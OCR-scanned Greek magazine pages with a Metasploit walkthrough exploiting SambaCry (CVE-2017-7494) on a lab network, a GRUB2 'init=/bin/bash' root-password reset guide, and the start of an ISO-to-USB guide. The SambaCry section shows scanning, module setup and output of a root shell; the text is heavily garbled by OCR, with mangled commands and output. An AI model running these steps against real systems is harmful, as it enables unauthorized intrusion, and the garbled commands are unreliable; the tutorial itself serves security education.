κύριο λόγο είναι τεχνικά καταρτισμένοι, ενώ γνωρίζουν αρκετά και үа то πώς δου- 
λεύουν τα exploits και οι επιθέσεις που τα εκμεταλλεύονται. Την ἴδια στιγµή όµως 
ο πυρήνας του Linux, οι υπηρεσίες, τα προγράµµατα στο иѕепапа και οι εφαρμογές 
που προσφέρονται µέσω Internet, εξακολουθούν να αναπτύσσονται και να συντη- 
ρούνται апо ανθρώπους - και οι άνθρωποι κάνουν λάθη. Όταν λοιπόν ερευνητές 
ασφαλείας ανακαλύπτουν αδυναμίες που αφορούν, T.X., σε δημοφιλείς υπηρεσίες 
που συναντάμε σε διανομές Linux, εκδοχές του BSD κ.ο.κ. καθόλου δεν πρέπει να 
εκπλησσόµεθα. 


Καλωσόρισες SambaCry! 


Όπως διαπιστώθηκε λίγες μέρες µετά то ξέσπασμα του WannaCry, τα Windows δεν 
εἶναι το µόνο σύστημα µε ευπάθεια remote execution µέσω του πρωτοκόλλου SMB 
(Server Message Block, https://en.wikipedia.org/wiki/Server_Message_Block). Το 
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То УУаппаСгу του Linux και η εκμετάλλευσή του 


(бо συμβαίνει και µε συστήµατα Linux που τρέχουν τη σουίτα διαµοίρασης αρχείων 
SAMBA. Το σχετικό bug μάλιστα ήταν εκεί για επτά ολόκληρα χρόνια και κανείς беу 
то хе παρατηρήσει. 


0 λόγος γίνεται για το СУЕ-2017-7494, µια ευπάθεια απομακρυσμένης εκτέ- 
λεσης που υφίσταται στις εκδόσεις της Samba από την 3.5.0 και νεότερες 
(http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7494). То  SambacCry, 
όπως ονομάστηκε το bug, апо τεχνικής σκοπιάς εἰναι εντελώς  διαφορετι- 
ко апо то НегпаіВіме, éva апо та bugs που εκμεταλλεύεται то WannaCry 
(https://en.wikipedia.org/wiki/EternalBlue). Πράγματι, ενώ то Еїегпа!Віие αποτελεί 
ένα ри ег overflow exploit, το бе SambaCry αφορά στο αυθαίρετο (µη-εξουσιοδοτη- 
μένο) φόρτωμα βιβλιοθηκών. Πα την εκμετάλλευση του SambaCry ο επιτιθέμενος 
αρκεί ν' ανεβάσει µια κατάλληλη βιβλιοθήκη σ’ éva Samba share ото οποίο επιτρέ- 
πεται η εγγραφή αρχείων. Σε πολλές εγκαταστάσεις της σουίτας, για την ευκολία 
των χρηστών υπάρχει τουλάχιστον éva τέτοιο share. Έχει ρόλο κοινόχρηστου XW- 
ρου διαµοίρασης αρχείων, για τους μόνιμους χρήστες του τοπικού δικτύου ή και για 
τους περιστασιακούς. Н βιβλιοθήκη που ανεβάζει ο επιτιθέμενος ото share, λοιπόν, 
εἶναι δυνατό να διαβαστεί апо τον Samba server, ο οποίος και θα εκτελέσει τον KW- 
δικα που περιλαμβάνει. 


То СУЕ-2017-7494 αντιμετωπίστηκε γρήγορα апо τους developers της Samba, οπότε 
ο καλύτερος τρόπος για την προστασία από το bug είναι η αναβάθμιση της σουίτας. 
Το πρόβλημα εἶναι σοβαρότερο µε та NAS. Н αναβάθμιση για τέτοια boxes συχνά on- 
μαίνει ότι πρέπει να κατεβάσουµε το κατάλληλο firmware апо το site του κατασκευ- 
αστή, ο οποίος όµως беу είναι σίγουρο ότι θα βιαστεί να κυκλοφορήσει νεότερη 
έκδοση, απαλλαγμένη апо το SambaCry. Αν μάλιστα μιλάμε για μοντέλα που πλέον 
δεν υποστηρίζονται, беу έχει νόηµανα περιμένουμε από τον κατασκευαστή να κάνει 
µια εξαίρεση και να κυκλοφορήσει update. 


Επίδειξη επίθεσης µε то Metasploit 


Έχει ήδη κυκλοφορήσει éva exploit module για το Metasploit, To οποίο εκμεταλλεύε- 
ται ΤΟ SambaCry και δουλεύει σε στόχους αρχιτεκτονικής X86, х86-64 και АВМ (µην 
ξεχνάτε τα NAS boxes). Στη συνέχεια του άρθρου εργαζόµαστε апо το Ка! Linux 
κι επιδεικνύουµε µια επίθεση που πραγματοποιείται µε τη βοήθεια του Metasploit, 
προς έναν Linux Samba server ο οποίος εἶναι ευπαθής κατά то СУЕ-2017-7494. Με 
την ευκαιρία δείχνουμε και πώς окауарооне hosts εντός του τοπικού δικτύου μέσα 
από то Metasploit, αλλά και πώς χρησιμοποιούμε τα exploit modules της πλατφόρ- 
μας. 

Αρχίζουµε ενημερώνοντας το Кай Linux, αν µη τι άλλο επειδή έτσι ίσως ауарабш- 
στεί και το Metasploit και συνεπώς Ва ΄χουμε το exploit module yia то СУЕ-2017-7494: 


гоо@Ка11:-# apt-get update 
root@kali:~# apt-get upgrade 
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ХУНАОКЕК 


Ξεκινάμε то Metasploit, φροντίζοντας шоте να επικοινωνεί µε την РоѕїдгеЅ01. 
(https://deltahacker.gr/kali-metasploit-postgresql). Θέλουμε να σκανάρουμε όλα та 
μηχανήματα του τοπικού δικτύου και τις σχετικές πληροφορίες να тіс αποθηκεύ- 
σουµε στη βάση του Metasploit. Στο prompt της πλατφόρμας, πληκτρολογούμε: 


msf > 


(Τα μηχανήματα του τοπικού µας δικτύου έχουν διευθύνσεις ΙΡ της µορφής 
192168193.% εσείς βεβαίως βάλτε τη μορφή των διευθύνσεων για το δικό σας ði- 
κτυο.) Μόλις το scanning ολοκληρωθεί, δίνουμε 


msf > 


και βλέπουμε τα μηχανήματα που εντοπίστηκαν κι αποθηκεύτηκαν στη βάση του 
Metasploit. 


Applications ~ Places т (9) Terminal ~ ип [η 4, 11:59 


root@kali: ~ 


mac name os_name os_flavor os_sp purpose info comments 


.168.193.238 00:0с:29:5с:с1:с3 міп10.со10ег.і5 Windows 10 client 
.168. 193.240 Б af: vogar.colder.is Linux Ў server 
. 168. 193.243 В ; holmavik.colder.is Linux 8 server 
.168. 193.250 E 3 selfoss.colder.is Linux 2 server 
. 168. 193.254 :0c:29:8b:ff: obsd.colder.is OpenBSD 2 device 
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Τρέξαμε то птар µέσα апд то Metasploit ({Ρ. птар) και та ενεργά μηχανήματα που βρέθηκαν αποθηκεύτηκαν στη βάση 
δεδοµένων της πλατφόρμας. Πληκτρολογώντας hosts παίρνουμε τη λίστα µε όλα αυτά τα hosts. 


Όλες тіс ενεργές υπηρεσίες όλων των hosts που βρήκε το ар. ΠΠΊ8Ρ,τις βλέπουμε 
πληκτρολογώντας: 


msf > 
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Το WannaCry του Linux και η εκμετάλλευσή του 


Applications ~ Places т [5] Terminal ~ sun jún 4, 12:00 


root@kali: ~ 
File Edit View Search Terminal Help 


msf > 
msf > services 


Services 


proto name info 


ssh Microsoft Windows IoT sshd 1.100 protocol 2.0 

тѕгрс Microsoft Windows RPC 

netbios-ssn Microsoft Windows netbios-ssn 

microsoft-ds open Microsoft Windows 7 - 10 microsoft-ds workgroup: COLDER 
http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP 

ssh open OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 Ubuntu Linux; protocol 2.0 
netbios open Samba smbd 3.X - 4.X workgroup: WORKGROUP 

netbios open Samba smbd 3.X - 4.X workgroup: WORKGROUP 

ssh open OpenSSH 7.2 protocol 2.0 

ssh open OpenSSH 7.2 protocol 2.0 

netbios open Samba smbd 3.X - 4.X workgroup: PARABING 

netbios open Samba smbd 3.X - 4.X workgroup: PARABING 

ssh open OpenSSH 7.5 protocol 2.0 

domain open dnsmasq 2.76 


То db_nmap που μόλις τρέξαμε δεν αποθήκευσε στη βάση του Metasploit μόνο та hosts που βρήκε, αλλά και τις ενεργές 
υπηρεσίες που έχουν. 


Εξετάζοντας τα έως τώρα αποτελέσµατα, εύκολα διαπιστώνουμε ότι έχουµε έναν 
host µε Windows, τρεις µε Linux κι έναν µε OpenBSD. Δύο апо τα Linux hosts έχουν 
τη Samba ενεργοποιημένη, οπότε θα επικεντρώσουµε την προσοχή µας σε αυτά. 
Το exploit που ψάχνουμε εἶναι για Linux και συγκεκριµένα για τη Samba. Αν θέλουμε 
να δούμε όλα” τα σχετικά exploits για τη Samba στο Linux, στη γραμμή εντολών 
του Metasploit γράφουμε use exploit/linux/samba και πατάμε δύο φορές το πλήκτρο 
[Tab]. 


e Edit View Search Terminal Help 
> 
msf > use exploit/linux/ a 
exploit/linux/samba/ p use exploit/linux/samba/lsa_transnames heap use exploit/linux/samba/trans2open 
πρ ο Кпомп рірепапе use ехр10ії/Ліпих/ѕатра/ѕесіпғоро1ісу һеар 
msf > 


То Tab completion, όπως то ξέρουμε από то ΒΑΘΗ, δουλεύει και στην κονσόλα του Metasploit. Στο εικονιζόµενο παράδειγµα 
το εφαρμόζουμε ώστε να δούµε όλα τα διαθέσιµα exploits για τη Samba ото Linux. 
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УНА©@КЕК 


Υπάρχουν πέντε τέτοια exploits. Προκειμένου να εντοπίσουµε εκείνο που τώρα θέ- 
AOUE, πατάμε το συνδυασμό πλήκτρων [CTRL+C] και καταφεύγουμε στην εντολή 
info. Για παράδειγµα, γράφουμε 


msf > info ехр101#/1іпих/ѕатра/15 Кпойп рірепате 


και διαβάζουμε την περιγραφή για το 15. ΚΠοννη. рірейпе. Εναλλακτικά, апо έναν web 
browser πηγαίνουμε στη διεύθυνση https://www.exploit-db.com/search και κάνουμε 
µια αναζήτηση για το ΟΝΕ του exploit – εν προκειμένω για то СУЕ-2017-7494. Στα 
αποτελέσµατα της αναζήτησης θα δούµε και το όνομα του exploit module. 


Applications ” Places» ИЯ Firefox ESR ~ sun jún 4, 14:28 


Samba - 'is-known-pipename()' Arbitrary Module Load (Metasploit) - Mozilla Firefox 


ρα Samba - 15. Кпомп-рі. х \ ж 


(Є) оа | https://www. exploit-db.com/exploits/42084/ E | е | [Q Search те 
епа Ноте Exploits Shellcode Papers Google Hacking Database Submit Search 
Samba - 'is_known_pipename()' Arbitrary Module Load 
(Metasploit) 
EDB-ID: 42084 Author: Metasploit Published: 2017-05-29 
CVE: СүЕ:2017-7494 Туре: Remote Platform: Linux 
Aliases: N/A Advisory/Source: Link Tags: Metasploit Framework 


E-DB Verified: φΡ Exploit: 2 Download / У Мем Raw Vulnerable App: Ν/Α 


« Previous Exploit Next Exploit 


H 
# This module requires Metasploit: http://metasploit.com/download 
# Current source: https://github.com/rapid7/metasploit- framework 
жн 


class MetasploitModule < М5: :Ехр101ії: :Βεποῖε 
Rank = ExcellentRanking 


include Msf::Exploit::Remote: :DCERPC 
include Msf::Exploit: :Βεποῖε: :5МВ: :Client 


Αναζητήσεις για exploits μπορούμε να Kávoupe κι από το βολικό site της Exploit Database. 


Το exploit που ψάχνουμε, λοιπόν, εἶναι το 15. Κποννη. рірепате. То φορτώνουμε δίνο- 
ντας: 


msf > use ехрі01%/11пих/<атра/15 Кпомп рірепате 


Παρατηρήστε ότι το prompt του Metasploit αλλάζει, ώστε να περιλαμβάνει το óvo- 
ра του exploit που μόλις φορτώσαμε. Κάθε exploit δέχεται παραμέτρους, тіс οποίες 
βλέπουμε πληκτρολογώντας: 


msf ехр1011(15 Кпойп рірепате) > options 
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Το WannaCry του Linux και η εκμετάλλευσή του 


File Edit View Search Terminal Help 
msf exploit(is_known_pipename) > 
msf exploit(is_known_pipename) > options 


Module options (exploit/linux/samba/is_known_pipename) : 

Name Current Setting Required Description 

RHOST The target address 

RPORT The SMB service port (TCP) 

SMB_FOLDER The directory to use within the writeable SMB share 

SMB _ SHARE МАМЕ The name of the SMB share containing a writeable directory 
Exploit target: 

Id Name 


© Automatic (Interact) 


msf exploit(is_known_pipename}) > 


Ιδού οι παράμετροι που δέχεται то exploit για την εκμετάλλευση тоо SambaCry. Από τις υποχρεωτικές, RHOST και RPORT, 
χρειάζεται уа αναθέσουµε τιµή µόνο στην πρώτη. Αναλυτικότερα, Ва τις δώσουμε τη διεύθυνση ІР του µηχανήµατος-στόχου. 


Н RHOST εἰναι υποχρεωτική κι αποθηκεύει τη διεύθυνση ІР του στόχου. Έχουμε δύο 
υποψήφιους στόχους, µε διευθύνσεις ІР 192.168.193.240 και 192.168.193.250 (δεν ap- 
κεί μόνο η έξοδος της εντολής hosts, αλλά χρειάζεται και η έξοδος της services). Ас 
δοκιµάσουµε µε то vogar.colder.is (192.168.193.240): 


msf ехр1011(15 ΚΠοιΠ рірепапе) > 


File Edit Мем Search Terminal Help 

msf exploit{is_known_pipename}) > 

msf ехр10ії(15 Кпомп рірепате) > set RHOST 192.168.193.240 
RHOST => 192.168.193.240 

msf exploit(is_known_pipename) > options 


Module options (exploit/linux/samba/is_known рірепапе) 
Name Current Setting Required Description 
RHOST 192.168.193.240 yes The target address 
RPORT 445 yes The SMB service port (TCP) 


SMB_FOLDER no The directory to use within the writeable SMB share 
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory 


Exploit target: 


Id Name 


0 Automatic (Interact) 


һе? exploit(is_known_pipename}) > check 


[+] 192.168.193.240:445 - Samba version 4.3.11 found with writeable share 'share' 
192.168.193.240:445 The target appears to be vulnerable. 
msf exploit(is_known_pipename) > ---- 


Μετά από έναν απλό έλεγχο, χωρίς να γίνει κάποια προσπάθεια για exploitation, όλα δείχνουν ότι ο στόχος µας είναι 
ευπαθής ως προς то СУЕ-2017-7494 -- ή αλλιώς SambaCry. 
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VHA@KER 


Επαληθεύουµε оті η ανάθεση τιμής στην RHOST πέτυχε, δίνοντας: 
msf ехр101%(15 Кпомп рірепате) > 


Είναι ο στόχος, µε ΙΡ αυτό που έχουµε αναθέσει στην παράμετρο RHOST, праүра- 
τι ευπαθής ως προς то СУЕ-2017-7494; Πριν καν επιχειρήσουμε να εξαπολύσουμε 
μια επίθεση, μπορούμε να κάνουμε έναν απλό έλεγχο µε την εντολή check του 
Metasploit: 


msf exploit(is_known_pipename) > 


Ωραία, ο στόχος μοιάζει να είναι πράγματι ευπαθής. Προκειμένου να εξαπολύσουμε 
την επἰθεσή µας, αρκεί να γράψουμε: 


msf ехр1011(15 ΚΠΟΙΠ рірепапе) > 


Δείτε та αποτελέσµατα ото screenshot που ακολουθεί, διαβάστε και τη σχετική 
περιγραφηῃ. 


File Edit View Search Terminal Help 
msf exploit(is_known_pipename) > 
msf exploit(is_known_pipename) > ехр1011 


192.168.193.240:445 - Using location \\192.168.193.240\share\ for the path 

192.168. 193.240:445 - Retrieving the remote path of the share 'share' 

192.168.193.240:445 - Share 'share' has server-side path '/mnt/incoming 

192.168.193.240:445 - Uploaded payload to \\192. 168.193 .240\share\WVCfBWJS .so 

192.168.193.240:445 - Loading the payload from server-side path /mnt/incoming/WVCfBWjS.so using \\PIPE\/mnt/incoming/WVCfBWJjS.so... 
192.168.193.240:445 - >> Failed to load STATUS OBJECT МАМЕ ΝΟΤ FOUND 

192.168.193.240:445 - Loading the payload from server-side path /mnt/incoming/WVCfBWjS.so using /mnt/incoming/WVCfBWJjS.so... 
192.168.193.240:445 - Probe response indicates the interactive payload was loaded... 

Found shell. 

Command shell session 1 opened (192.168.193.252:44227 -> 192.168.193.240:445) at 2017-06-04 17:40:02 +0000 


vogar.colder.is 


lsb_release -a 

No LSB modules are available. 
Distributor ID: Ubuntu 
Description: Ubuntu 16.04.2 LTS 
Release: 16.04 

Codename: xenial 


15 -lha /root 


root 4.0K May 29 07:20 . 
root 4.0K May 29 07:22 .. 
root 3.1K Oct 22 2015 .bashrc 
root 148 Aug 17 2015 .profile 


H εκμετάλλευση тоо exploit για то SambaCry ήταν επιτυχής! Αν και στο τερματικό δεν απεικονίζεται Κάποιο σχετικό 
prompt, το μήνυμα "Command shell session 1 opened" φανερώνει ότι έχουμε shell access στον απομακρυσμένο 
host. Πληκτρολογώντας μερικές εντολές (βλέπε εκείνες στο κόκκινο υπόβαθρο) βεβαιωνόμαστε ότι πράγματι 
κινούμαστε εντός του µηχανήµατος-στόχου, έχοντας μάλιστα πρόσβαση στο λογαριασμό του ἰδιου тоо root! 
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Skill: Beginner 
Tags: openSUSE, Fedora, Ubuntu, GRUB2, local access hacks 


Πώς 
επανακαθορίζουµε 
ξεχασμένο гоої 
password στο Linux 


Πότε ήταν η τελευταία φορά поо µε τρόμο συνειδητοποιήσατε ότι δεν 
θυμόσαστε то root password σε υπολογιστή µε Linux; Όσο άσχετο κι αν σας 
φαίνεται το ερώτημα (ή όσο κι αν ντρεπόσαστε να παραδεχτείτε ότι την έχετε 
ήδη πάθει), ας σημειώσουμε ότι то να ξεχάσει κάποιος το συνθηματικό του 
διαχειριστή δεν είναι κάτι που συμβαίνει σπάνια. 


Την επόμενη φορά που беу θα µπορείτε να συνδεθείτε στο root account ка- 
morou υπολογιστή σας µε Linux, µην πανικοβληθείτε. Πάρτε µια βαθιά ανά- 
σα κι αναρωτηθείτε: Υπάρχει µήπως άλλος υπολογιστής ή συσκευή, απ’ όπου 
έχετε φροντίσει για passwordless SSH logins στον υπό συζήτηση λογαριασμό; 
(https://deltahacker.gr/?p=13357) Αν ναι, απλά πηγαίνετε σ' αυτόν τον άλλον UTO- 
λογιστή ἡ συσκευή, συνδεθείτε στο προαναφερθέν root account απομακρυσμένα, 
αλλάξτε το password µε το εργαλείο passwd, αγαλιάστε και χαρείτε. Ίσως όμως να 
μην έχετε φροντίσει για passwordless logins - τουλάχιστον όχι σε root accounts. Н 
μπορεί να ΄χετε φροντίσει, αλλά τώρα беу έχετε εύκαιρο τον άλλον υπολογιστή ή 
συσκευή. Σε κάθε περίπτωση, αν έχετε φυσική πρόσβαση στον υπολογιστή µε το 
ξεχασμένο root password, κι αυτός µε τη σειρά του διαθέτει éva ταπεινό πληκτρο- 
λόγιο και µια σεμνή οθόνη, μάθετε ότι είναι εύκολο να ορίσετε καινούργιο password 
για τον root — KL ας µη θυµόσαστε το παλιό. 


Στη συνέχεια δείχνουμε пос αλλάζουμε το ξεχασμένο root password συστήματος 
не openSUSE Leap 42.2. Υποθέτουμε βεβαίως ότι υπάρχει φυσική πρόσβαση στον 
υπολογιστή, καθώς κι ότι ο boot manager είναι ο GRUB2. Παρόμοια εργαζόµαστε κι 
όταν αντί για openSUSE ο υπολογιστής τρέχει Ubuntu ή Fedora. Ένα ή δύο σηµεία 
που χρειάζονται προσοχή τα επισηµαίνουµε προς το τέλος του άρθρου. 
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Πώς επανακαθορίζουµε ξεχασμένο root password στο Linux 


openSUSE Leap 42.2 


Advanced options for openSUSE Leap 42.2 


Start bootloader from a read-only snapshot 


Πιέστε το πλήκτρο [Ε1 a 
ώστε να επεξερδαστείτε το 
φωτισμένο boot entry 


|| 
Π 


Βήμα 1. Ξεκινάμε ή επανεκκινούµε το μηχάνημα και μόλις εμφανιστείη οθόνη του 
ΟΒυΒ2Ζγιατην επιλογή boot entry, πριν τελειώσει το Count down μετακινούμαστε 
µε τα βελάκια του δρομέα πάνω από τη γραμμή που αντιστοιχεί στο φυσιολογικό 
φόρτωματου λειτουργικού (συνήθως πρόκειταιγια την πρώτη επιλογή). Αντί για 
το πλήκτρο [Enter] πατάμε το [Е] (από το Edit). 


Βήμα2. Βλέπουμε τώρα το τµήµα από το configuration του GRUB2, το οποίο αντι- 
στοιχεί στο επιλεγμένο boot entry. Με то κάτω βελάκι μετακινούµμαστε στο τέ- 
λος της οδηγίας που αρχίζει µε "linux" (χωρίς τα εισαγωγικά). Πιθανότατα беу θα 
χωρά σε μία µόνο γραμμή και θα εκτείνεται σε περισσότερες. Στο παράδειγμά рас 
φαίνεται να καταλαμβάνει τρεις γραμμές (εξαιτίας ενός και µόνο χαρακτήρα). - 
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ΥΗΑΘΚεκ 


GNU GRUB 


setparams ‘openSUSE Leap 42.2 


jload=keep 


hint 
bg 


Βήμα 3. Στο τέλος της γραμμής αφήνουμε éva κενό και πληκτρολογούμε "rw init=/ 
bin/bash" (χωρίς τα εισαγωγικά). Βεβαιωνόμαστε ότι δεν έχουµε κάνει κάποιο λά- 
бос πληκτρολόγησης και πατάμε το συνδυασμό πλήκτρων [CTRL+X]. Ξεκινά τότε 
то φόρτωματης διανομής, αλλά αυτή τη φορά λαμβάνοντας υπόψη την τροποποι- 
ηµένη οδηγία. 


3 
3 
3 
3 
3 
3 
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Stopped Load Kernel Modules. 

Stopped target Local File Systems. 

Stopped target Local File Systems (Pre). 

Stopped target Swap. 

Stopped target Sockets. 

Stopped target Paths. 

Stopped Dispatch Password Requests to Console Directory Watch. 

Stopped udev Kernel Device Manager. 

Started witch root service. 

Stopped Create Static Device Nodes in /деу. 

Stopped Create list of required static device nodes for the current kernel. 

Closed udev Kernel Socket. 

Closed udev Control Socket. 

Starting Cleanup udevd DB... 

Started Cleanup udevd DB. 

Reached target Switch Root. 

Starting Switch Root... 
.792777] usb 1-2: New USB device found, ійЧепаог=060ғ -auii 
«2933381 usb 1-2: New USB device strings: Mfr=8, Product=1, "S 
.2939151 usb 1 duct: (Жыаге Virtual USB Hub 
.8081781 SB hub found 
.8013691 ? ports detected 
.8071431 si journald[223]1: Received SIGTERM from PID 1 (g 
.8173371 bash: 28 output lines suppressed due to ratelimiting 


olmavik:/ ἢ 


Βήμα 4. Ελάχιστα δευτερόλεπτα αργότερα η διαδικασία εκκίνησης θα έχει ολο- 
κληρωθεί. Δεν θαείµαστε στο περιβάλλον γραφικών, οὐτε σε κάποια text console 
όπου θα µας ζητείται σύνδεση σε λογαριασμό χρήστη. Αντίθετα, θα βρισκόμαστε 
σε éva BASH shell και μάλιστα µέσα апо το λογαριασμό του χρήστη root! 
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Πώς επανακαθορίζουµε ξεχασμένο root password στο Linux 


һвітәміКк:/ # 

New password : 

Retype new password : 

passwd: password updated successfully 
holmavik:7 # 

ποἰπαωυ κ. # _ 


το password δεν εμφανίζεται στην οθόνη 


Βήμα 5. Па την αλλαγή του ξεχασμένου password χρησιμοποιούμε το εργαλείο 
passwd. Θα µας ζητηθεί να πληκτρολογήσουµε το νέο συνθηματικό - δύο φορές, 
ώστε να είμαστε βέβαιοι γιατοτι δώσαμε. Και λέμε να είμαστε βέβαιοι διότι, για 
λόγους ασφαλείας, καθώς πληκτρολογούμε το password οι χαρακτήρες беу ер- 
φανίζονται στην οθόνη. Αμέσως µετά γράφουμε sync και πατάμε то [Enter], npo- 
κειμένου να διασφαλίσουµε πως ότι είναι να γραφτεί στο δίσκο θα γραφτεί τώρα 
(και беу θα παραμείνει στην cache). Μόλις ορίσαµε νέο password για τον χρήστη 
root - кі ас µην θυμόμαστε το παλιό! Па την επανεκκίνηση του συστήµατος πλη- 
κτρολογούμε "/ѕбіп/героої -f" (φυσικά χωρίς τα εισαγωγικά). 


Περίπτωση Ubuntu. Σε αντίθεση µε то openSUSE και άλλες διανομές Linux, όταν 
στον υπολογιστή έχουµε εγκατεστημένο το Ubuntu τότε беу βλέπουμε το μενού 
του САОВ2 κατά την (επαν)εκκίνηση του συστήµατος. Па το πείσουµε να εµφανι- 
στεί, (επαν)εκκινούµε κιαµέσως µετάτα μηνύματα POST κρατάμε то πλήκτρο [Shift] 
πατημένο μέχρι να το δούμε. Στη συνέχεια προχωράμε κι αλλάζουμε root password 
κατά τα γνωστά. 


Περίπτωση Fedora. Αφού ορίσουμε το νέο password και πριν το sync (και την ena- 
νεκκίνηση), λόγω SELinux πληκτρολογούμε "touch /.autorelabel" (πάντα χωρίς та 
εισαγωγικά). Κατά την εκκίνηση πιθανώς θα παρατηρήσετε ότι το σύστηµα αργεί 
κάπως να σηκωθεί και να µας φέρει στην οθόνη σύνδεσης. Το γεγονός αυτό οφεί- 
λεται στο SELinux και συμβαίνει μόνο στην πρώτη επανεκκίνηση μετά την αλλαγή 
root password. 
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Skill: Beginner 
Tags: ISO, USB, burning, Linux, macOS, Windows 


Πως γράφουμε 
αρχεία 150 
σε USB sticks, 
απὀ οποιοδήποτε 
λειτουργικό σύστημα 


Οι νεοφερµένοι στον κόσµο του LiNuX συχνά ακούτε και διαβάζετε ότι πρέπει να 
κατεβάσετε το τάδε ISO image και µετά να то γράψετε σε Ср, DVD ў USB stick. 
Για τέτοιες δουλειές παλιότερα χρησιμοποιούσαµε δισκάκια CD/DVD, σήμερα 

όμως είναι προτιμότερο уа καταφεύγουµε σε USB sticks. Σε κάθε περίπτωση, η 

εγγραφή αρχείου ISO δεν σηµαίνει ότι απλά το αντιγράφουµε στο νέο μέσο. 


Τα αρχεία ISO μπορούμε να та φανταζόμαστε ως ακριβή αντίγραφα αποθηκευτικὠν 
μέσων, τα οποία τις περισσότερες φορές είναι bootable. Ας υποθέσουμε για παρά- 
δειγµα ότι θέλουμε να εγκαταστήσουµε στον υπολογιστή µας το openSUSE Leap 
42.2 (https://www.opensuse.org). Πρώτη µας δουλειά εἶναι να κατεβάσουμε то ISO 
image που "μέσα" του έχει τον installer του Leap, εκατοντάδες (ή μάλλον χιλιάδες) 
πακέτα εργαλείων κι εφαρμογών, καθώς κι ένα σωρό άλλα συνοδευτικά αρχεία. Το 
εν λόγω ISO image είναι bootable. Αυτό σηµαίνει ότι αν το γράψουμε µε τον “κατάλ- 
ληλο3 τρόπο σε δισκάκι DVD (δεν χωράει σε CD) ἡ σε USB stick (επαρκούς χωρητι- 
κότητας) και φροντίσουμε ώστε ο υπολογιστής µας να ξεκινήσει από το δισκάκι ή 
το στικάκι, τότε θα φορτώσει ο boot loader του ISO και θα έχουµε την ευκαιρία να 
ξεκινήσουμε τον installer του openSUSE, επομένως και να εγκαταστήσουμε το OU- 
γκεκριμένο λειτουργικό. 


Το μυστικό εδώ είναι ότι та ISO images δεν τα μεταφέρουμε σε CD/DVD/USB sticks, 
όπως θα µεταφέραμε ένα οποιοδήποτε άλλο αρχείο. Αντίθετα, γιατην εγγραφή του 
ISO image χρειαζόμαστε το κατάλληλο εργαλείο. Στη συνέχεια δείχνουμε πώς δου- 
λεύουμε όταν είµαστε σε Linux, σε macOS ἡ σε Windows, προκειμένου να γράφουμε 
то ISO image του openSUSE Leap 42.2 σε USB stick. 
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Πώς γράφουμε αρχεία ISO σε USB sticks, από οποιοδήποτε λειτουργικό σύστημα 


Σημείωση. Αναφερόμαστε στο΄ µεγάλο” ISO image, χωρητικότητας 4,76В, το οποίο 
περιλαμβάνει όλα τα απαιτούμενα πακέτα ώστε η εγκατάσταση να πραγµατοποι- 
είται χωρίς κατέβασμα πρόσθετων στοιχείων από το Internet (http://download. 
орепвиве.ога/дівігіршіоп/Іеар/42.2/15о/ореп595Е-І 868ρ-42.2-ΡΝΡ-χ86. 64.ἱ5ο). 
Προφανώς, παρόμοια εργαζόµαστε αν αντί για το ISO του openSUSE έχουµε ένα 
µιας οποιασδήποτε άλλης διανομής Linux, µιας εκδοχής του BSD κ.ο.κ. 


Εργασία από Linux 


Πρώτη µας δουλειά εἶναι να βρούμε το device ће που αντιστοιχεί στο USB stick. 
Αμέσως µετά γράφουμε το αρχείο ISO επί του USB καταφεύγοντας στο εργαλείο 
аа. Ένας τρόπος για να βρούμε το device file του USB εἰναι να συνδέσουµε το stick 
στον υπολογιστή, σε ένα τερματικό να τρέξουµε το εργαλείο dmesg, και στην ἐξοδό 
του να παρατηρήσουμε то ζητούμενο device file. Εναλλακτικά, σε διανομές LiNuX µε 
то Systemd μπορούμε να βρούμε το ζητούμενο device Ше στην έξοδο του journalctl 
(https://deltahacker.gr/?p=16816). 


Activities [5] Terminal ~ sun mai 7, 14:34» 


cvar@holmavik:~ 
File Edt View Search Terminal Help 


3 LEN=276 
Г 8.631994] SFW2-INext-DROP-DEFLT IN=eth@ OUT= МАС- SRC=fe80:0000:0000:0000:0250:56ff:fe2b:5bc8 DST=ff 
02:0000:0000:0000:0000:0000:0000:00fb LEN=292 ТС=0 HOPLIMIT=255 FLOWLBL=847996 PROTO=UDP 5РТ-5353 DPT=535 
3 LEN=252 
Г 40.055905] SFW2-INext-DROP-DEFLT IN=eth@ Οὐτ- МАС- SRC=fe80:0000:0000:0000:0250:56ff:fe2b:5bc8 DST=ff 
02:0000:0000:0000:0000:0000:0000:00fb LEN=87 TC=0 HOPLIMIT=255 FLOWLBL=847996 PROTO=UDP SPT=5353 DPT=5353 
LEN=47 
E 72.011951] l: new high-speed USB device number 2 using ehci-pci 
[ 72.069566] SFW2-INext-DROP-DEFLT IN=eth@ OUT= МАС- SRC=fe80:0000:0000:0000:0250:56ff:fe2b:5bc8 DST=ff 
02:0000:0000:0000:0000:0000:0000:00fb LEN=87 TC=0 HOPLIMIT=255 FLOWLBL=847996 PROTO=UDP SPT=5353 DPT=5353 
LEN=47 

72.168421] 2 New USB device found, idVendor=0781, idProduct=5412 

72.168428] 2 New USB device strings: Mfr=1, Product=2, SerialNumber=3 

72.168431] 2 Product: Cruzer Fleur 

72.168432] : Manufacturer: SanDisk Corporation 

72.168434] 1: SerialNumber: 0000167C87723417 

72.187438] ge 2- ): USB Mass Storage device detected 

72.192607] : usb-storage 2-1:1.0 

72.192719] 2 registered new interface driver usb-storage 

72.194191] τ registered new interface driver uas 


73.225424] τ Attached scsi generic sgl type ϐ 
73.226952] : [sdb] 16041613 512-byte logical blocks: (8.21 68/7.65 GiB 
73.229295] : [sdb] Write Protect is off 

73.229298] : [sdb] Mode Sense: 03 00 00 00 

73.230315] [ 

73.230318] 


545: sdbl sdb2 
73.248413] : [sdb] Attached SCSI removable disk 
var@hólmavík:~> J 


г 
г 
г 
г 
г 
г 
г 
г 
г 
[ 73.223980] :0: Direct-Access SanDisk Cruzer Fleur 4.05 PQ: © ANSI: 2 
[8 
|i 
г 
г 
г 
г 
L 
[1 
c 


To device file του USB stick 
φαίνεται στην έξοδο του dmesg 


Συνδέουµε то USB stick στον υπολογιστή µας και σε éva τερματικό τρέχουμε то dmesg (δεν χρειάζονται δικαιώματα 
διαχειριστή). Στην έξοδο του εργαλείου υπάρχει και Το device file του stick. Στο παράδειγμά µας είναι то sdb, επομένως то 
πλήρες path είναι то /dev/sdb. 
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sun таї 7, 14:40 


cvar@holmavik:~ 
e Edit View Search Terminal Help 


holmavik kernel: usb 
holmavik kernel: usb 
holmavik kernel: usb 


2-1: new high-speed USB device number 2 using ehci-pci 

2 

2 
